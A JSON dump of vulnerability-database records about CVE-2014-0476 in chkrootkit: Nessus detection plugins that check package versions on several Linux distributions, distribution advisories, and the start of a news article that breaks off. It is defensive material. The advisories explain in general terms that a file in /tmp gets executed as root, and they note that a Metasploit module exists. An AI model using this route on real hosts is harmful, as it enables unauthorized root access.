audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"chkrootkit-0.49-9.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:54", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-13T00:00:00", "title": "Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:chkrootkit"], "id": "FEDORA_2014-7071.NASL", "href": "https://www.tenable.com/plugins/nessus/74500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7071.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74500);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"FEDORA\", value:\"2014-7071\");\n\n script_name(english:\"Fedora 20 : chkrootkit-0.49-9.fc20 (2014-7071)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104457\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134326.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd61f626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"chkrootkit-0.49-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:36", "description": "Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when\n/tmp is mounted without the noexec option.", "edition": 15, "published": "2014-06-04T00:00:00", "title": "Debian DSA-2945-1 : chkrootkit - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chkrootkit", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2945.NASL", "href": "https://www.tenable.com/plugins/nessus/74294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2945. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74294);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"DSA\", value:\"2945\");\n\n script_name(english:\"Debian DSA-2945-1 : chkrootkit - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when\n/tmp is mounted without the noexec option.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/chkrootkit\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chkrootkit packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"chkrootkit\", reference:\"0.49-4.1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:51", "description": "A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.", "edition": 23, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : chkrootkit (ALAS-2014-370)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:chkrootkit", "p-cpe:/a:amazon:linux:chkrootkit-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-370.NASL", "href": "https://www.tenable.com/plugins/nessus/78313", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-370.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78313);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"ALAS\", value:\"2014-370\");\n\n script_name(english:\"Amazon Linux AMI : chkrootkit (ALAS-2014-370)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A quoting issue was found in chkrootkit which would lead to a file in\n/tmp/ being executed, if /tmp/ was mounted without the noexec option.\nchkrootkit is typically run as the root user. A local attacker could\nuse this flaw to escalate their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-370.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update chkrootkit' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:chkrootkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"chkrootkit-0.49-9.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"chkrootkit-debuginfo-0.49-9.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit / chkrootkit-debuginfo\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:06:20", "description": "The remote host is affected by the vulnerability described in GLSA-201709-05\n(chkrootkit: Local privilege escalation)\n\n When /tmp is mounted without the noexec option chkrootkit will execute\n files in /tmp with root privileges.\n \nImpact :\n\n A local attacker could possibly execute arbitrary code with root\n privileges.\n \nWorkaround :\n\n Users should mount /tmp with noexec option.", "edition": 24, "published": "2017-09-18T00:00:00", "title": "GLSA-201709-05 : chkrootkit: Local privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chkrootkit"], "id": "GENTOO_GLSA-201709-05.NASL", "href": "https://www.tenable.com/plugins/nessus/103273", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-05.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103273);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_xref(name:\"GLSA\", value:\"201709-05\");\n\n script_name(english:\"GLSA-201709-05 : chkrootkit: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-05\n(chkrootkit: Local privilege escalation)\n\n When /tmp is mounted without the noexec option chkrootkit will execute\n files in /tmp with root privileges.\n \nImpact :\n\n A local attacker could possibly execute arbitrary code with root\n privileges.\n \nWorkaround :\n\n Users should mount /tmp with noexec option.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All chkrootkit users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-forensics/chkrootkit-0.50'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-forensics/chkrootkit\", unaffected:make_list(\"ge 0.50\"), vulnerable:make_list(\"lt 0.50\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:27:18", "description": "Thomas Stangner discovered that chkrootkit incorrectly quoted certain\nvalues. A local attacker could use this issue to execute arbitrary\ncode when chkrootkit is run and gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2014-06-05T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 13.10 / 14.04 LTS : chkrootkit vulnerability (USN-2230-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "modified": "2014-06-05T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:chkrootkit", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2230-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74322", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2230-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74322);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0476\");\n script_bugtraq_id(67813);\n script_xref(name:\"USN\", value:\"2230-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 13.10 / 14.04 LTS : chkrootkit vulnerability (USN-2230-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thomas Stangner discovered that chkrootkit incorrectly quoted certain\nvalues. A local attacker could use this issue to execute arbitrary\ncode when chkrootkit is run and gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2230-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chkrootkit package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chkrootkit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chkrootkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|13\\.10|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 13.10 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-4ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"13.10\", pkgname:\"chkrootkit\", pkgver:\"0.49-4.1ubuntu1.13.10.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"chkrootkit\", pkgver:\"0.49-4.1ubuntu1.14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chkrootkit\");\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "Thomas Stangner discovered that chkrootkit incorrectly quoted certain \nvalues. A local attacker could use this issue to execute arbitrary code \nwhen chkrootkit is run and gain root privileges.", "edition": 5, "modified": "2014-06-04T00:00:00", "published": "2014-06-04T00:00:00", "id": "USN-2230-1", "href": "https://ubuntu.com/security/notices/USN-2230-1", "title": "chkrootkit vulnerability", "type": "ubuntu", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "chkrootkit is a tool to locally check for signs of a rootkit. It contains: * chkrootkit: shell script that checks system binaries for rootkit modification. * ifpromisc: checks if the network interface is in promiscuous mode. * chklastlog: checks for lastlog deletions. * chkwtmp: checks for wtmp deletions. * chkproc: checks for signs of LKM trojans. * chkdirs: checks for signs of LKM trojans. * strings: quick and dirty strings replacement. * chkutmp: checks for utmp deletions. ", "modified": "2014-06-13T05:30:39", "published": "2014-06-13T05:30:39", "id": "FEDORA:E2C6D23CD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: chkrootkit-0.49-9.fc19", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "chkrootkit is a tool to locally check for signs of a rootkit. It contains: * chkrootkit: shell script that checks system binaries for rootkit modification. * ifpromisc: checks if the network interface is in promiscuous mode. * chklastlog: checks for lastlog deletions. * chkwtmp: checks for wtmp deletions. * chkproc: checks for signs of LKM trojans. * chkdirs: checks for signs of LKM trojans. * strings: quick and dirty strings replacement. * chkutmp: checks for utmp deletions. ", "modified": "2014-06-13T05:26:35", "published": "2014-06-13T05:26:35", "id": "FEDORA:84EC8239ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: chkrootkit-0.49-9.fc20", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:49", "bulletinFamily": "info", "cvelist": ["CVE-2014-3145", "CVE-2014-3144", "CVE-2014-3153", "CVE-2014-0476"], "description": "[](<https://2.bp.blogspot.com/-pxMyh-8rhv0/U5L2SbAMTZI/AAAAAAAAb_I/A-iqdubuyv8/s1600/linux-kernel-hacking.jpg>)\n\nMultiple flaws have been identified in Linux Kernel and related software could allow hackers to hack your Linux machines, shared hosting and websites hosted on them.\n\n \n\n\n**PRIVILEGE ESCALATION VULNERABILITY IN LINUX KERNEL**\n\nA privilege escalation vulnerability has been [identified](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>) in the widely used Linux kernel that could allow an attackers to take the control of users\u2019 system.\n\n \n\n\nOn Thursday, the most popular distributor of open source Linux OS, Debian warned about this vulnerability (CVE-2014-3153) in a security update, along with some other vulnerabilities in the Linux kernel that may lead to a denial of service attack.\n\n \n\n\nThe most critical one is the flaw (CVE-2014-3153) discovered by Pinkie Pie which resides in the futex subsystem call of _[Linux Kernel](<https://thehackernews.com/search/label/Linux%20kernel>) 2.6.32.62/3.2.59/3.4.91/3.10.41/3.12.21/3.14.5 